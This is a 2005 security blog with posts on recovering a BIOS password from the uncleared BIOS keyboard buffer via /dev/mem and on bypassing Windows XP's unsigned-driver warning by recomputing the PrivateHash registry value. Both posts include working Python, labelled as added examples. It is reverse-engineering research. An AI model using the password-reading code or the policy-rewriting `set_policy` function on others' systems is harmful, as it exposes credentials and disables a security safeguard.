Sec, blogmal!
Thu, 29 Dec 2005

Greetings from the CCC Congress

Just a quick wave from the CCC Congress. Quite interesting as usual, but also a bit stressful. More details once I'm back…

– Sec

posted at: 19:12 | Category: /misc

Tue, 20 Dec 2005

Reading out the BIOS password

A posting on bugtraq that is barely two weeks old discusses, besides various other (not very surprising) findings about BIOS passwords, one astonishing fact: the BIOS uses an area of RAM as its keyboard buffer and never clears it, not even after a password has been typed into it. On top of that, the area sits so conveniently at the very beginning of physical memory that no traditional OS (Windows, Linux, *BSD) overwrites it. (It is the keyboard ring buffer of the BIOS Data Area at 0x40:0x1E: sixteen 16-bit entries, ASCII code in the low byte and scan code in the high byte, which is why only every second byte is interesting.)

To try it out, simply look at every second byte in RAM starting at 0x041e. On a Unix-like system, for example:

 dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head

Voilà, there it is. (And no, I'm not going to post my password here ;)

Reading /dev/mem requires root. Current Linux kernels still expose the low megabyte even with CONFIG_STRICT_DEVMEM, but kernel lockdown (as enabled under Secure Boot) blocks /dev/mem altogether, and a UEFI machine booted without legacy BIOS emulation does not maintain this buffer in the first place.
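The decoder below is an added example, not code from the original post: it takes a snapshot of the BIOS Data Area (the 256 bytes at 0x400), pulls the ASCII column out of the 16-slot keyboard ring buffer, and also rotates the slots from the head pointer so that the last 16 keystrokes come out in chronological order even when a long password wrapped around the buffer. The layout it assumes is the standard legacy-BIOS one (head pointer at 0x41A, tail at 0x41C, slots at 0x41E..0x43D); the `build_sample_bda` image is constructed here for offline use and is not a real memory dump, and the `--live` switch reading /dev/mem is this example's own convention.

```python
# Added example, not part of the original post: decode the BIOS keyboard
# ring buffer from a BIOS Data Area (BDA) snapshot.  Layout assumed here is
# the standard legacy-BIOS one: head pointer at 0x41A, tail pointer at 0x41C,
# sixteen 16-bit slots at 0x41E..0x43D, low byte = ASCII, high byte = scan code.
import sys

BDA_PHYS = 0x400     # physical address of the BDA
BDA_LEN = 0x100
KBD_HEAD = 0x1A      # offsets within the BDA (0x41A, 0x41C, 0x41E)
KBD_TAIL = 0x1C
KBD_BUF = 0x1E
KBD_SLOTS = 16
KBD_END = KBD_BUF + 2 * KBD_SLOTS   # 0x3E, one past the last slot


def kbd_slots(bda: bytes) -> list[tuple[int, int]]:
    """Return the 16 (ascii, scancode) pairs stored in the ring buffer."""
    return [(bda[KBD_BUF + 2 * i], bda[KBD_BUF + 2 * i + 1]) for i in range(KBD_SLOTS)]


def _printable(ascii_code: int) -> str:
    return chr(ascii_code) if 0x20 <= ascii_code < 0x7F else "."


def raw_ascii_dump(bda: bytes) -> str:
    """'Every second byte from 0x41E': the ASCII column in memory order."""
    return "".join(_printable(a) for a, _ in kbd_slots(bda))


def stale_keystrokes(bda: bytes) -> str:
    """The same 16 slots, rotated so the oldest entry comes first.

    The BIOS password prompt consumes each key as it is typed, so afterwards
    head == tail points at the next slot to be written, i.e. the oldest slot
    still present.  Rotating from the head pointer therefore yields the last
    16 keystrokes chronologically, even if the password wrapped the buffer."""
    head = int.from_bytes(bda[KBD_HEAD:KBD_HEAD + 2], "little")
    start = (head - KBD_BUF) // 2 if KBD_BUF <= head < KBD_END else 0
    slots = kbd_slots(bda)
    return "".join(_printable(a) for a, _ in slots[start:] + slots[:start])


def build_sample_bda(typed: str) -> bytes:
    """Constructed BDA image for offline testing (not a real memory dump).

    Simulates a BIOS prompt that reads each key immediately: the slot is
    written, both pointers advance, and nothing is ever zeroed."""
    bda = bytearray(BDA_LEN)
    slot = 0
    for ch in typed:
        bda[KBD_BUF + 2 * slot] = ord(ch)
        # scan code: 0x1C is Enter; other keys are left as 0 in this sample
        bda[KBD_BUF + 2 * slot + 1] = 0x1C if ch == "\r" else 0x00
        slot = (slot + 1) % KBD_SLOTS
    nxt = (KBD_BUF + 2 * slot).to_bytes(2, "little")
    bda[KBD_HEAD:KBD_HEAD + 2] = nxt
    bda[KBD_TAIL:KBD_TAIL + 2] = nxt
    bda[0x80:0x82] = KBD_BUF.to_bytes(2, "little")   # 0x480: buffer start
    bda[0x82:0x84] = KBD_END.to_bytes(2, "little")   # 0x482: buffer end
    return bytes(bda)


def read_bda(path: str = "/dev/mem") -> bytes:
    """Read the live BDA; needs root and a kernel that exposes low memory."""
    with open(path, "rb") as f:
        f.seek(BDA_PHYS)
        return f.read(BDA_LEN)


if __name__ == "__main__":
    live = len(sys.argv) > 1 and sys.argv[1] == "--live"
    bda = read_bda() if live else build_sample_bda("hunter2\r")
    print("memory order :", raw_ascii_dump(bda))
    print("chronological:", stale_keystrokes(bda))
```

Run it without arguments to see the constructed sample, or as root with `--live` to decode the real buffer. Non-printable bytes (the Enter key's 0x0D, never-written zero slots) are shown as dots.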

– Sec

posted at: 23:28 | Category: /rev-eng

Wed, 07 Dec 2005

Installing unsigned drivers in Windows

If you install a driver on Windows XP which is not blessed by Microsoft, you get a nasty dialog box with a warning. Microsoft tries to tell people this is for stability reasons; see this blog entry at The Old New Thing for someone arguing for it, and read the comments for reasons why the idea only sounds good on paper.

About a year ago this had also come up on the OpenVPN mailing list (see here). Someone in that thread pointed out that Microsoft says you can't change it from your own program, which triggered my hacker gene to see how it could be done anyway.

Liberal use of regmon revealed that the setting is indeed stored in the Policy value under HKLM\Software\Microsoft\Driver Signing, but there was also a write to the PrivateHash value under HKLM\Software\Microsoft\Windows\CurrentVersion\Setup.

With the help of apispy it was easy to find out that PrivateHash is an MD5 hash over the Policy value widened to 4 bytes together with a seed. The seed is the 4-byte seed value under HKLM\System\WPA\PnP. That hash is the reason a plain edit of Policy alone does not stick: it ties the setting to a machine-specific value, so anyone changing Policy has to recompute PrivateHash as well.

This was quickly written down in a small proof of concept program. And please, don't even think about ugly things like automating a mouse click to acknowledge such a dialog box again. :)

(Note that this is the XP-era policy for the warning dialog. 64-bit Windows from Vista onwards enforces kernel-mode code signing in the loader itself, and no registry value switches that off.)
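As an added example (not the post's own proof of concept), here is the hash computation described above, together with a consistency check that shows why editing Policy alone fails. Two details the post does not spell out are assumed here: both inputs are packed as little-endian DWORDs, and Policy comes before the seed. The registry paths and value names are the ones the post mentions; the `SAMPLE_SEED` and the snapshot dictionary are constructed for offline demonstration, and the `winreg` functions only run on Windows.

```python
# Added example, not the post's own proof of concept: recompute the
# PrivateHash that Windows XP keeps alongside the driver-signing Policy.
# Assumptions not stated in the post: both inputs are packed as
# little-endian DWORDs, Policy first, seed second.
import hashlib
import struct
import sys

POLICY_IGNORE, POLICY_WARN, POLICY_BLOCK = 0, 1, 2

DRIVER_SIGNING_KEY = r"SOFTWARE\Microsoft\Driver Signing"       # value "Policy"      (REG_BINARY, 1 byte)
SETUP_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Setup"   # value "PrivateHash" (REG_BINARY, 16 bytes)
WPA_PNP_KEY = r"SYSTEM\WPA\PnP"                                  # value "seed"        (REG_DWORD)


def hash_input(policy: int, seed: int) -> bytes:
    """Policy widened to 4 bytes, followed by the 4-byte seed (assumed order)."""
    if policy not in (POLICY_IGNORE, POLICY_WARN, POLICY_BLOCK):
        raise ValueError(f"policy must be 0, 1 or 2, got {policy}")
    return struct.pack("<II", policy, seed & 0xFFFFFFFF)


def compute_private_hash(policy: int, seed: int) -> bytes:
    return hashlib.md5(hash_input(policy, seed)).digest()


def policy_is_consistent(policy: int, seed: int, stored_hash: bytes) -> bool:
    """True when the stored PrivateHash matches Policy for this machine's seed."""
    return compute_private_hash(policy, seed) == bytes(stored_hash)


def read_policy_state() -> tuple[int, int, bytes]:
    """Windows only: (policy, seed, stored_hash) straight from the registry."""
    import winreg
    hklm = winreg.HKEY_LOCAL_MACHINE
    with winreg.OpenKey(hklm, DRIVER_SIGNING_KEY) as k:
        policy_raw, _ = winreg.QueryValueEx(k, "Policy")
    with winreg.OpenKey(hklm, WPA_PNP_KEY) as k:
        seed, _ = winreg.QueryValueEx(k, "seed")
    with winreg.OpenKey(hklm, SETUP_KEY) as k:
        stored, _ = winreg.QueryValueEx(k, "PrivateHash")
    return policy_raw[0], seed, bytes(stored)


def set_policy(policy: int) -> None:
    """Windows only, needs admin: write Policy and the matching PrivateHash together."""
    import winreg
    hklm = winreg.HKEY_LOCAL_MACHINE
    with winreg.OpenKey(hklm, WPA_PNP_KEY) as k:
        seed, _ = winreg.QueryValueEx(k, "seed")
    with winreg.OpenKey(hklm, DRIVER_SIGNING_KEY, 0, winreg.KEY_SET_VALUE) as k:
        winreg.SetValueEx(k, "Policy", 0, winreg.REG_BINARY, bytes([policy]))
    with winreg.OpenKey(hklm, SETUP_KEY, 0, winreg.KEY_SET_VALUE) as k:
        winreg.SetValueEx(k, "PrivateHash", 0, winreg.REG_BINARY,
                          compute_private_hash(policy, seed))


# Constructed registry snapshot for offline demonstration (made-up seed).
SAMPLE_SEED = 0x4D2C0A17
SAMPLE_SNAPSHOT = {
    "Policy": bytes([POLICY_WARN]),
    "seed": SAMPLE_SEED,
    "PrivateHash": compute_private_hash(POLICY_WARN, SAMPLE_SEED),
}


def tamper_demo(snapshot: dict) -> tuple[bool, bool]:
    """(consistent as stored, consistent after flipping Policy without rehashing)."""
    before = policy_is_consistent(snapshot["Policy"][0], snapshot["seed"], snapshot["PrivateHash"])
    edited = dict(snapshot, Policy=bytes([POLICY_IGNORE]))   # what a naive registry edit does
    after = policy_is_consistent(edited["Policy"][0], edited["seed"], edited["PrivateHash"])
    return before, after


if __name__ == "__main__":
    if sys.platform == "win32":
        policy, seed, stored = read_policy_state()
        print("live policy:", policy, "hash consistent:", policy_is_consistent(policy, seed, stored))
    else:
        print("sample snapshot consistent before/after naive edit:", tamper_demo(SAMPLE_SNAPSHOT))
```

On a non-Windows box the script only exercises the constructed snapshot; on XP it reads the three live values and reports whether they agree, which is also a quick way to verify the assumed byte order before trusting `set_policy`.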

– Sec

posted at: 17:53 | Category: /rev-eng

powered by blosxom